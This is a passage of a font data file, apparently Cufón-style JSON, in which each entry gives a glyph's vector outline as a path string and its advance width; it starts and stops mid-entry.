,{"d":"210,-99v0,57,-47,104,-105,104v-53,0,-81,-35,-81,-88v1,-117,70,-198,191,-180v-3,10,-1,25,-8,31v-66,-23,-129,26,-140,83v48,-33,143,-24,143,50xm109,-22v39,-2,64,-32,64,-73v0,-57,-74,-51,-110,-29v-10,44,-4,104,46,102","w":228},{"d":"273,-262r-60,262r-35,0r30,-129r-131,0r-30,129r-35,0r61,-262r35,0r-24,104r130,0r24,-104r35,0","w":270},{"d":"159,-229r-25,0r-35,-66r42,0","w":228},{"d":"202,-235r-149,0r6,-27r150,0xm42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14","w":216},{"d":"188,-146v35,35,-4,87,-36,101v14,7,25,17,24,37v-1,74,-98,89,-164,65v3,-10,1,-25,8,-32v35,25,140,22,118,-37v-29,-30,-109,-16,-109,-73v0,-38,27,-53,50,-69v-14,-8,-23,-18,-24,-37v1,-73,97,-89,165,-66v-4,10,-2,26,-9,33v-35,-25,-139,-22,-117,36v19,23,74,21,94,42xm130,-53v33,-9,59,-74,6,-83r-34,-10v-32,9,-60,74,-6,83","w":228},{"d":"200,-295r-38,0r8,-34r37,0xm134,-24v44,0,70,-22,98,-36r-9,40v-68,43,-200,32,-200,-74v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77","w":251},{"d":"61,-103v-5,77,79,94,144,68r15,-67r-70,0r7,-30r104,0r-26,113v-30,10,-56,25,-97,24v-69,0,-113,-36,-115,-103v-5,-137,136,-206,258,-145r-8,40r-4,0v-23,-22,-50,-35,-91,-35v-77,0,-112,57,-117,135","w":279},{"d":"124,-229r-37,0r8,-34r37,0xm-40,39v27,15,65,3,72,-26r43,-183r-41,0r6,-26r74,0r-46,201v-9,53,-54,82,-115,64","w":123},{"d":"35,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73","w":228},{"d":"271,-120r-35,0r-80,-110r-80,110r-35,0r104,-142r22,0","w":294},{"d":"153,0r-158,0r5,-24r146,-146r-112,0r6,-26r154,0r-6,23r-146,147r117,0","w":189},{"d":"150,-202v40,0,59,27,59,68v0,94,-76,171,-164,124r-4,10r-31,0r63,-274r33,0r-23,98v20,-13,36,-26,67,-26xm51,-36v63,38,124,-16,124,-92v0,-61,-70,-46,-98,-20","w":224},{"d":"142,53r-30,0r-68,-327r30,0","w":163},{"d":"267,-360r-58,66r-24,0r42,-66r40,0xm196,-360r-58,66r-24,0r42,-66r40,0xm175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"185,-81v13,-20,19,-50,24,-79r36,0v-7,39,-21,72,-44,98r52,62r-42,0r-32,-39v-26,26,-48,43,-91,44v-40,1,-73,-24,-73,-62v0,-50,35,-74,70,-92v-53,-37,-16,-118,57,-118v34,0,61,18,61,49v0,43,-33,61,-72,73xm119,-160v28,-8,46,-23,47,-57v1,-17,-14,-29,-30,-29v-32,-2,-54,36,-37,64v4,7,10,14,20,22xm54,-69v0,63,88,55,112,14r-67,-81v-24,12,-45,31,-45,67","w":261},{"d":"89,-196r-46,196r-33,0r46,-196r33,0xm124,-235r-100,0r6,-27r100,0","w":98},{"d":"59,-63v-15,43,34,44,61,33r-6,28v-48,17,-109,0,-89,-62r8,-30r-23,0r5,-23r23,0r12,-53r-22,0r6,-26r22,0r13,-57r33,0r-13,57r68,0r-6,26r-68,0r-12,53r53,0r-5,23r-53,0","w":141},{"d":"376,-262r-126,262r-40,0r-8,-217r-101,217r-39,0r-11,-262r35,0r8,218r102,-218r35,0r7,220r104,-220r34,0","w":356},{"d":"200,32r-5,21r-231,0r5,-21r231,0","w":228},{"d":"222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0","w":245},{"d":"230,-360r-55,66r-41,0r-24,-66r28,0r22,45r42,-45r28,0xm224,-86v-2,96,-139,109,-215,69v5,-12,3,-31,11,-40v36,51,197,44,159,-40v-39,-31,-134,-10,-136,-82v-2,-86,131,-108,202,-68v-4,11,-3,29,-10,37v-34,-43,-185,-37,-147,42v36,33,137,11,136,82","w":246},{"d":"86,-175r-24,0r-25,-99r43,0","w":96},{"d":"175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75xm196,-295r-25,0r-35,-66r42,0","w":283},{"d":"211,-294r-27,0r-23,-45r-42,45r-29,0r55,-66r40,0xm83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r63,-274r33,0"},{"d":"170,-266v58,-1,94,37,94,95v0,90,-64,176,-151,176v-87,0,-102,-79,-80,-162r194,0v6,-46,-18,-79,-63,-79v-33,0,-61,11,-91,24r9,-38v27,-11,57,-16,88,-16xm221,-125r-159,0v-10,52,3,102,55,100v57,-2,92,-49,104,-100","w":272},{"d":"64,0r-42,0r11,-50r43,0","w":130},{"d":"202,-295r-63,66r-27,0r44,-66r46,0","w":228},{"d":"128,-262r-48,190r-30,0r39,-190r39,0xm66,0r-36,0r9,-37r36,0","w":141},{"d":"42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14xm184,-229r-35,0r8,-34r35,0xm111,-229r-35,0r8,-34r35,0","w":216},{"d":"222,-294r-27,0r-22,-45r-43,45r-28,0r54,-66r41,0xm222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0","w":245},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm144,-33v33,13,84,10,92,-25r42,-177r-57,0r6,-27r92,0r-44,194v-10,58,-70,83,-139,67","w":313},{"d":"262,-10r-30,0r0,-96r-189,0r0,-28r219,0r0,124","w":294},{"d":"109,-274r-32,102r-24,0r17,-102r39,0","w":96},{"d":"63,-251v49,-23,154,-28,150,41v-6,92,-109,134,-164,181r141,0r-7,29r-177,0r8,-37v45,-35,114,-83,145,-121v26,-32,22,-82,-26,-80v-28,0,-55,12,-77,23","w":228},{"d":"169,-120v15,-57,-52,-70,-86,-40v-12,11,-21,23,-26,40r112,0xm52,-95v-22,85,90,82,132,47r-7,36v-58,29,-162,23,-162,-59v0,-67,52,-131,119,-131v61,0,79,51,63,107r-145,0","w":214},{"d":"134,-24v44,0,70,-22,98,-36r-9,40v-68,43,-200,32,-200,-74v0,-133,126,-212,243,-149r-8,39r-3,0v-18,-20,-44,-34,-82,-34v-75,0,-110,60,-112,137v-1,49,25,77,73,77","w":251},{"d":"61,-254v48,-20,141,-22,139,41v-3,63,-52,82,-95,105r-8,38r-32,0r13,-54v35,-18,85,-33,85,-83v0,-50,-82,-28,-110,-13xm83,0r-36,0r9,-37r36,0","w":196},{"d":"106,-263r-8,34r-37,0r8,-34r37,0xm89,-196r-46,196r-33,0r46,-196r33,0","w":98},{"d":"237,-301r-149,0r6,-26r149,0xm245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"50,-75v0,72,87,53,119,26r-7,37v-54,29,-147,21,-147,-57v0,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98","w":187},{"d":"107,-274r-64,274r-33,0r63,-274r34,0","w":98},{"d":"206,-322v14,0,20,-14,23,-28r21,0v-8,30,-19,52,-50,54v-26,1,-30,-26,-52,-29v-13,2,-20,13,-22,29r-22,0v6,-29,21,-51,50,-53v27,-2,29,27,52,27xm175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":283},{"d":"207,-74r-39,0r-18,74r-34,0r18,-74r-126,0r10,-40r160,-148r33,0r-37,161r39,0xm140,-101r27,-118r-128,118r101,0","w":228},{"d":"61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0xm163,-229r-25,0r-35,-66r42,0"},{"d":"57,-52v0,52,17,95,41,124r-37,0v-19,-31,-37,-70,-36,-118v2,-108,56,-172,114,-228v12,2,31,-3,39,2v-59,49,-119,114,-121,220","w":163},{"d":"222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0xm216,-295r-35,0r8,-34r35,0xm143,-295r-35,0r8,-34r35,0","w":245},{"d":"114,-146r-42,0r11,-50r43,0xm80,0r-42,0r12,-50r42,0","w":163},{"d":"133,-128v32,6,66,18,66,52v0,48,-44,72,-94,76r-15,63r-21,0r15,-62v-28,0,-55,-7,-73,-17r7,-32v19,10,42,23,72,24r18,-78v-34,-5,-66,-19,-66,-54v0,-44,45,-71,94,-73r11,-48r21,0r-11,47v23,0,47,9,63,15v-4,10,-3,24,-10,31v-17,-11,-34,-19,-59,-21xm130,-205v-37,-1,-70,34,-45,62v5,5,14,9,28,12xm111,-25v53,7,76,-68,16,-74","w":228},{"d":"83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r63,-274r33,0"},{"d":"211,-322v14,0,20,-14,23,-28r22,0v-9,30,-20,52,-51,54v-26,1,-30,-26,-52,-29v-13,2,-20,13,-22,29r-22,0v6,-29,21,-51,50,-53v27,-2,29,27,52,27xm212,0r-41,0r-72,-234r-54,234r-33,0r61,-262r52,0r66,214r49,-214r33,0","w":269},{"d":"273,-164r-58,0r-27,66r54,0r-3,24r-61,0r-30,74r-22,0r30,-74r-48,0r-30,74r-23,0r30,-74r-52,0r4,-24r58,0r27,-66r-54,0r4,-24r60,0r30,-74r23,0r-30,74r47,0r30,-74r23,0r-30,74r52,0xm193,-164r-49,0r-27,67r49,0","w":294},{"d":"69,43v45,9,65,-7,74,-51r28,-134v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0r-5,21v40,-43,147,-34,121,48v-27,84,-15,220,-141,199"},{"d":"207,-272v0,37,-34,71,-73,71v-29,0,-52,-23,-52,-50v0,-36,36,-69,72,-69v28,0,53,20,53,48xm138,-224v41,5,64,-72,13,-74v-41,-4,-63,72,-13,74xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"15,-63v0,-94,76,-169,165,-125r19,-86r33,0r-63,274r-33,0r5,-21v-42,41,-126,35,-126,-42xm50,-69v-4,60,69,48,97,21r26,-113v-14,-7,-27,-12,-47,-12v-54,0,-72,50,-76,104","w":224},{"d":"335,-138r-22,0r0,-108r-4,0r-41,79r-14,0r-42,-81r-5,0r0,110r-21,0r0,-124r41,0r34,67r34,-67r40,0r0,124xm155,-241r-40,0r0,103r-23,0r0,-103r-40,0r0,-21r103,0r0,21","w":351},{"d":"105,0r-104,0r6,-25r34,0r49,-211r-34,0r6,-26r103,0r-5,26r-35,0r-49,211r35,0xm149,-322v13,0,19,-14,22,-28r22,0v-9,30,-20,52,-51,54v-26,1,-30,-27,-52,-29v-13,2,-19,14,-22,29r-22,0v6,-29,22,-51,51,-53v27,-2,29,27,52,27","w":151},{"d":"222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0xm191,-295r-25,0r-35,-66r42,0","w":245},{"d":"258,-104r-203,90r0,-31r160,-70r-160,-69r0,-32r203,90r0,22","w":294},{"d":"-34,43v34,14,77,2,70,-43r-26,0r63,-274r34,0r-63,270v6,1,16,-2,20,1v2,57,-46,91,-104,72","w":98},{"d":"245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"85,-36v97,52,189,-75,141,-179xm213,-226v-96,-53,-189,75,-140,178xm123,5v-23,1,-44,-5,-58,-14r-28,35r-23,0r36,-46v-17,-16,-27,-41,-27,-73v-2,-117,96,-207,210,-160r24,-30r24,0r-33,41v17,17,28,40,27,73v-3,100,-52,170,-152,174xm238,-361r-63,66r-27,0r44,-66r46,0","w":283},{"d":"187,69v-36,10,-76,3,-76,-36v0,-12,2,-19,6,-28v-73,7,-100,-41,-84,-110r36,-157r35,0r-40,177v-18,68,77,80,109,39v40,-53,41,-145,62,-216r35,0v-31,98,-22,237,-125,263v-9,20,-9,47,21,47v9,0,20,-5,27,-6","w":263},{"d":"338,-150v-1,51,-20,92,-46,122r-81,0r0,-20v-33,34,-106,29,-106,-37v0,-79,66,-136,138,-102v-1,-13,19,-6,30,-8r-35,148r46,0v17,-22,29,-66,30,-100v1,-63,-40,-100,-103,-98v-92,4,-146,67,-152,159v-5,89,84,122,170,95r-5,24v-97,26,-195,-17,-190,-114v6,-108,72,-181,180,-186v76,-3,124,43,124,117xm135,-89v0,50,58,41,81,17r21,-92v-50,-31,-102,15,-102,75","w":360},{"d":"194,-322v14,0,20,-14,23,-28r21,0v-8,30,-19,52,-50,54v-26,1,-31,-26,-52,-29v-13,2,-20,13,-22,29r-22,0v6,-30,21,-52,50,-53v27,-2,29,27,52,27xm222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0","w":245},{"d":"193,-202v0,58,-37,109,-94,109v-40,1,-64,-27,-64,-66v0,-56,39,-109,94,-108v39,0,64,24,64,65xm103,-119v37,-1,59,-39,58,-81v0,-27,-10,-42,-36,-42v-37,0,-59,40,-58,81v0,27,10,42,36,42","w":196},{"d":"89,-196r-46,196r-33,0r46,-196r33,0xm104,-257v11,0,16,-12,17,-24r20,0v-6,24,-17,44,-41,46v-21,2,-21,-19,-36,-22v-11,1,-14,11,-17,23r-19,0v4,-24,18,-43,41,-45v21,-1,21,20,35,22","w":98},{"d":"118,-225r-36,0r9,-37r36,0xm68,0r-40,0r49,-190r30,0","w":141},{"d":"168,-215v0,56,-28,105,-82,104v-33,0,-53,-19,-53,-52v-1,-57,29,-104,82,-104v33,0,53,18,53,52xm91,-134v37,0,45,-41,46,-81v0,-19,-7,-29,-26,-29v-38,2,-47,42,-47,81v0,19,8,29,27,29xm367,-98v0,55,-28,103,-82,103v-34,0,-53,-18,-53,-52v0,-57,29,-103,82,-103v34,0,53,18,53,52xm289,-17v37,0,45,-42,47,-81v0,-20,-7,-30,-26,-30v-36,0,-47,40,-47,81v0,19,7,30,26,30xm306,-262r-183,262r-29,0r183,-262r29,0","w":387},{"d":"153,0r-158,0r5,-24r146,-146r-112,0r6,-26r154,0r-6,23r-146,147r117,0xm179,-295r-63,66r-27,0r44,-66r46,0","w":189},{"d":"114,-146r-42,0r11,-50r43,0xm106,-50r-76,115r-26,0r57,-115r45,0","w":163},{"d":"141,-250v26,-1,39,-19,45,-45r29,0v-10,37,-35,68,-78,68v-39,0,-59,-26,-54,-68r29,0v-2,27,4,46,29,45xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"300,-196r-92,196r-30,0r-20,-152r-81,152r-31,0r-12,-196r34,0r5,152r80,-152r28,0r19,152r65,-152r35,0","w":294},{"d":"264,-31r-219,0r0,-28r95,0r0,-74r-95,0r0,-28r95,0r0,-96r29,0r0,96r95,0r0,28r-95,0r0,74r95,0r0,28","w":294},{"d":"222,-234v-37,-13,-69,0,-78,39r-9,40r60,0r-5,23r-59,0v-16,83,-24,190,-139,164v3,-9,1,-23,8,-29v40,13,70,-4,78,-43r19,-92r-42,0r6,-23r41,0v6,-71,42,-130,127,-108","w":228},{"d":"190,0r-40,0r-63,-86r-28,23r-15,63r-33,0r63,-274r34,0r-41,176r115,-98r44,0r-112,92xm10,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73","w":211},{"d":"228,-199v-3,79,-67,107,-158,101r-23,98r-35,0r61,-262v73,0,158,-10,155,63xm77,-126v65,4,112,-10,114,-67v1,-44,-45,-41,-90,-40","w":217},{"d":"221,-156r-11,18r-64,-38r1,64r-21,0r1,-64r-64,38r-11,-18r68,-37r-68,-36r11,-19r64,38r-1,-64r21,0r-1,64r64,-37r11,18r-68,36","w":228},{"d":"83,-175v28,-28,102,-43,116,5v41,-44,148,-47,127,43r-30,127r-33,0v10,-49,31,-91,31,-144v0,-50,-72,-21,-92,-2v-8,51,-22,97,-32,146r-33,0r31,-144v-6,-49,-67,-22,-91,-3r-34,147r-33,0r45,-196r33,0","w":350},{"d":"227,-224v-21,-13,-68,-24,-90,0v-19,20,-23,60,-31,93r73,0r-6,23r-72,0v-3,40,-32,60,-57,79r147,0r-6,29r-182,0r7,-32v35,-9,50,-36,58,-76r-32,0r6,-23r30,0v5,-88,61,-164,163,-127","w":228},{"d":"205,-107r-115,79r8,-37r78,-51r-54,-52r8,-33r78,78xm126,-107r-110,73r8,-34r74,-48r-52,-48r7,-32r76,74","w":232},{"d":"85,-36v97,52,189,-75,141,-179xm213,-226v-96,-53,-189,75,-140,178xm123,5v-23,1,-44,-5,-58,-14r-28,35r-23,0r36,-46v-17,-16,-27,-41,-27,-73v-2,-117,96,-207,210,-160r24,-30r24,0r-33,41v17,17,28,40,27,73v-3,100,-52,170,-152,174","w":283},{"d":"255,-14r-203,-90r0,-22r203,-90r0,32r-160,69r160,70r0,31","w":294},{"d":"187,-34r-76,-73r3,-15r110,-74r-8,35r-74,48r52,48xm110,-28r-79,-79r4,-16r114,-78r-8,36r-77,52r53,52","w":232},{"d":"138,-229r-38,0r8,-34r38,0xm153,0r-158,0r5,-24r146,-146r-112,0r6,-26r154,0r-6,23r-146,147r117,0","w":189},{"d":"226,0r-41,0r-81,-117r-36,31r-20,86r-35,0r61,-262r35,0r-32,136r154,-136r44,0r-143,126xm33,43v36,14,79,3,72,-47r28,0v3,59,-46,92,-105,73","w":249},{"d":"61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0xm192,-229r-35,0r8,-34r35,0xm119,-229r-35,0r8,-34r35,0"},{"d":"178,0r-166,0r61,-262r35,0r-54,232r131,0xm211,-274r-65,89r-22,0r47,-89r40,0","w":200},{"d":"61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0xm206,-295r-63,66r-27,0r44,-66r46,0"},{"d":"156,-175r-23,0r-25,-99r42,0xm85,-175r-23,0r-25,-99r42,0","w":165},{"d":"81,-240v27,0,45,-5,52,-22r24,0r-33,142r40,0r-5,21r-108,0r4,-21r41,0r23,-101r-42,0","w":195},{"d":"151,-202v39,0,58,28,58,68v0,94,-77,167,-164,124r-19,82r-33,0r80,-346r33,0r-23,98v20,-13,38,-26,68,-26xm98,-25v55,0,74,-47,77,-103v3,-61,-70,-46,-98,-20r-26,111v15,7,25,12,47,12","w":224},{"d":"222,0r-36,0r-8,-74r-113,0r-43,74r-37,0r156,-262r46,0xm174,-102r-17,-129r-76,129r93,0xm220,-361r-63,66r-27,0r44,-66r46,0","w":245},{"d":"212,0r-41,0r-72,-234r-54,234r-33,0r61,-262r52,0r66,214r49,-214r33,0","w":269},{"d":"93,20r-31,54r-26,0r18,-54r39,0xm156,-92v40,63,-51,117,-124,91v-12,-4,-21,-7,-29,-11v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v21,16,73,11,87,33","w":187},{"d":"246,-262r-111,146r-4,17r65,0r-5,24r-65,0r-6,23r66,0r-6,23r-65,0r-7,29r-33,0r7,-29r-65,0r5,-23r65,0r6,-23r-65,0r5,-24r65,0r4,-13r-46,-150r35,0r33,116r85,-116r37,0","w":228},{"d":"313,0r-166,0r23,-98r-91,0r-61,98r-38,0r168,-262r226,0r-7,30r-131,0r-18,74r132,0r-7,29r-131,0r-23,99r131,0xm176,-126r25,-108r-35,0r-69,108r79,0xm315,-361r-63,66r-27,0r44,-66r46,0","w":356},{"d":"89,-196r-46,196r-33,0r45,-196r34,0xm142,-295r-63,66r-27,0r44,-66r46,0","w":98},{"d":"246,-262r-111,146r-4,17r65,0r-5,24r-65,0r-6,23r66,0r-6,23r-65,0r-7,29r-33,0r7,-29r-65,0r5,-23r65,0r6,-23r-65,0r5,-24r65,0r4,-13r-46,-150r35,0r33,116r85,-116r37,0","w":228},{"d":"176,-180r-42,0r0,-48r42,0r0,48xm265,-101r-221,0r0,-28r221,0r0,28xm176,-1r-42,0r0,-49r42,0r0,49","w":294},{"d":"238,-310v0,37,-34,71,-73,71v-29,0,-52,-23,-52,-50v0,-36,36,-69,72,-69v28,0,53,20,53,48xm169,-262v41,4,63,-72,12,-74v-41,-4,-62,72,-12,74xm67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0","w":263},{"d":"139,-267v52,0,80,37,80,89v-2,115,-70,199,-191,179v3,-10,1,-25,8,-31v65,23,129,-26,140,-82v-49,32,-143,24,-143,-51v0,-57,48,-104,106,-104xm70,-167v0,56,74,53,110,30v10,-45,4,-103,-46,-103v-40,0,-64,33,-64,73","w":228},{"d":"313,0r-166,0r23,-98r-91,0r-61,98r-38,0r168,-262r226,0r-7,30r-131,0r-18,74r132,0r-7,29r-131,0r-23,99r131,0xm176,-126r25,-108r-35,0r-69,108r79,0","w":356},{"d":"175,-267v62,-2,102,36,100,98v-4,99,-51,171,-152,174v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75xm238,-361r-63,66r-27,0r44,-66r46,0","w":283},{"d":"200,-228r-27,0r-23,-46r-42,46r-29,0r55,-67r40,0xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"327,-267v1,47,-17,67,-54,74v8,111,-43,195,-150,198v-62,2,-100,-36,-99,-98v3,-101,52,-170,151,-174v45,-2,79,19,92,52v27,-5,32,-17,33,-52r27,0xm129,-23v75,0,107,-64,109,-141v1,-46,-24,-75,-68,-75v-75,0,-107,65,-110,141v-2,46,24,75,69,75","w":290},{"d":"190,0r-40,0r-63,-86r-28,23r-15,63r-33,0r63,-274r34,0r-41,176r115,-98r44,0r-112,92","w":211},{"d":"189,-295r-56,67r-40,0r-25,-67r29,0r22,45r42,-45r28,0xm81,-167v30,-21,52,-34,95,-27v-4,10,-4,23,-9,32v-37,-10,-70,7,-92,23r-32,139r-33,0r45,-196r33,0","w":153},{"d":"223,-196r-125,196r-33,0r-34,-196r34,0r25,156r96,-156r37,0","w":212},{"d":"188,-267v82,0,152,71,152,152v0,81,-71,152,-152,152v-81,0,-152,-70,-152,-152v0,-82,70,-152,152,-152xm188,17v70,0,131,-62,131,-132v0,-71,-61,-133,-131,-133v-70,0,-132,62,-132,133v0,71,62,132,132,132xm255,-155v0,25,-17,40,-37,47r67,70r-39,0r-58,-62r-28,0r0,62r-29,0r0,-161v55,1,123,-10,124,44xm160,-122v33,1,64,1,64,-31v-1,-28,-35,-24,-64,-24r0,55","w":360},{"d":"151,-7v-49,18,-141,22,-139,-41v2,-63,51,-83,95,-105r8,-38r32,0r-13,53v-33,20,-85,32,-85,83v0,50,82,28,110,13xm129,-262r36,0r-9,37r-36,0","w":196},{"d":"67,-103v-12,43,1,82,48,80v54,-2,72,-35,83,-79r37,-160r35,0v-35,108,-19,263,-161,267v-69,2,-91,-46,-76,-110r36,-157r35,0xm196,-295r-25,0r-35,-66r42,0","w":263},{"d":"203,-101r-175,0r6,-28r175,0","w":228},{"d":"129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50xm159,-229r-25,0r-35,-66r42,0","w":218},{"d":"163,-316v26,-1,38,-19,45,-44r29,0v-10,37,-36,66,-79,67v-40,1,-58,-28,-53,-67r29,0v-2,27,5,45,29,44xm245,-262r-7,30r-137,0r-17,74r137,0r-6,29r-138,0r-23,99r138,0r-7,30r-173,0r61,-262r172,0"},{"d":"78,-132v64,4,114,-7,114,-65v0,-42,-49,-36,-91,-36xm230,-205v0,47,-35,81,-74,92r75,113r-41,0r-69,-105r-49,0r-25,105r-35,0r61,-262v71,1,156,-13,157,57","w":250},{"d":"-40,39v27,15,65,3,72,-26r43,-183r-41,0r6,-26r74,0r-46,201v-9,53,-54,82,-115,64xm138,-228r-26,0r-21,-46r-41,46r-29,0r53,-67r40,0","w":123},{"d":"191,-228r-26,0r-23,-46r-43,46r-28,0r55,-67r40,0xm42,-50v0,47,80,20,99,2r13,-56v-51,6,-112,2,-112,54xm56,-192v54,-15,156,-22,137,59r-31,133r-32,0r4,-21v-27,29,-130,45,-127,-23v3,-76,76,-81,152,-86v10,-30,-10,-43,-42,-43v-21,0,-50,10,-67,14","w":216},{"d":"45,72r-36,0r57,-83r-35,-185r34,0r27,146r94,-146r36,0","w":212},{"d":"203,-99v0,93,-107,126,-187,88v4,-11,2,-27,9,-35v40,37,141,28,141,-46v0,-53,-73,-44,-116,-36r31,-134r157,0r-7,30r-123,0r-16,72v55,-9,111,9,111,61","w":228},{"d":"211,-295r-55,67r-40,0r-25,-67r28,0r22,45r43,-45r27,0xm83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0"},{"d":"105,-133r-31,0r0,-141r31,0r0,141xm105,69r-31,0r0,-140r31,0r0,140","w":163},{"d":"118,-50v0,34,-33,101,27,96r20,0r-5,23v-46,3,-88,-6,-84,-49v5,-50,29,-119,-47,-111r6,-26v60,4,78,-37,86,-89v8,-49,49,-74,112,-68r-5,24v-88,-16,-66,77,-104,118v-11,11,-26,20,-43,26r-1,4v21,9,38,25,38,52","w":228},{"d":"149,-220v-5,-38,-64,-17,-84,-6r6,-30v36,-16,113,-20,111,30v-3,56,-61,77,-100,102r91,0r-6,25r-127,0r6,-28v36,-27,97,-43,103,-93","w":195},{"d":"148,-229r-38,0r8,-34r38,0xm50,-75v0,72,87,53,119,26r-7,37v-54,29,-147,21,-147,-57v0,-98,89,-162,179,-116v-4,11,-2,28,-9,36v-13,-13,-31,-24,-58,-24v-48,0,-77,48,-77,98","w":187},{"d":"177,-274r-32,102r-24,0r17,-102r39,0xm109,-274r-32,102r-23,0r16,-102r39,0","w":165},{"d":"156,-92v40,63,-51,117,-124,91v-12,-4,-21,-7,-29,-11v4,-11,2,-28,9,-36v22,27,116,45,119,-10v-11,-44,-104,-11,-104,-74v0,-69,100,-84,155,-54v-4,10,-2,27,-9,34v-23,-32,-137,-30,-104,27v21,16,73,11,87,33","w":187},{"d":"119,-266v39,0,70,30,70,69v0,40,-32,71,-70,70v-37,0,-70,-31,-70,-70v0,-38,32,-69,70,-69xm119,-154v24,0,42,-19,42,-43v0,-24,-19,-43,-42,-43v-23,0,-42,19,-42,43v0,24,18,43,42,43","w":195},{"d":"231,-295r-58,66r-24,0r42,-66r40,0xm160,-295r-58,66r-24,0r42,-66r40,0xm61,-85v-7,29,-8,63,29,60v22,-2,46,-14,61,-25r34,-146r33,0r-45,196r-33,0r5,-22v-39,42,-141,38,-121,-47r30,-127r33,0"},{"d":"196,-228r-27,0r-23,-46r-42,46r-29,0r55,-67r40,0xm129,-202v46,0,75,28,74,75v-2,75,-37,130,-113,132v-46,1,-75,-28,-74,-75v3,-75,40,-132,113,-132xm95,-22v52,-3,72,-47,74,-102v0,-31,-15,-51,-45,-50v-52,2,-72,48,-74,102v0,30,16,51,45,50","w":218},{"d":"83,-175v40,-43,141,-36,121,48r-30,127r-33,0r30,-142v-1,-53,-74,-23,-94,-5r-34,147r-33,0r45,-196r33,0"},{"d":"89,-99r-55,-97r37,0r40,75r74,-75r40,0r-100,99r55,97r-37,0r-41,-75r-74,75r-40,0","w":213},{"d":"59,-63v-15,43,34,44,61,33r-6,28v-48,17,-104,1,-89,-62r25,-106r-22,0r6,-26r22,0r13,-57r33,0r-13,57r68,0r-6,26r-68,0","w":141},{"d":"170,-243v-44,-13,-77,4,-81,47r60,0r-7,26r-58,0r-39,170r-33,0r38,-170r-22,0r6,-26v9,-1,26,5,24,-7v9,-54,53,-83,118,-69","w":126},{"d":"105,69r-31,0r0,-343r31,0r0,343","w":163},{"d":"73,-262v103,-5,198,3,19